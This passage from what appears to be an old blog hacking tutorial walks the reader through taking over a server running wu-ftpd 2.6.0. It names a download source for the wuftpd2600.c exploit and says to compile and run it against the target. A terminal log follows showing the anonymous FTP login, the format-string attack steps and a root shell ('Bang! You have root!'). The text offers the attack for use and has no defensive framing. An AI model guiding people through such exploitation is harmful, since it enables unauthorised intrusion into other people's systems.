From the above you can see that we FTPd to 196.1.2.3 and that 196.1.2.3
is runing wu-2.6.0. We also tried loging in as "anonymous" and it was
successfull too.
g) Get exploit for this version of FTPd. go to www.hack.co.za
(daemon/ftp/ section) and get wuftpd2600.c exploit. View this exploit
code and you'll see that its coded for spesific OSs one of which is
Red Hat 6.2. Lets say that lame_box.za.net is runing Red Hat 6.2 to our
luck :) Then just compile this exploit, run it against lame_box.za.net
and it should give you root access (ie. full control of the system):
----------------------------- cut here -----------------------------
root@kgb:~/# ./wuftpd2600 -t -s 0 196.1.2.3
Target: 196.1.2.3 (ftp/
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS
230-Next time please use your e-mail address as your password
230- for example: joe@kgb.za.net
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shell
Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
Bang! You have root!
Jai Shree Raam
No comments:
Post a Comment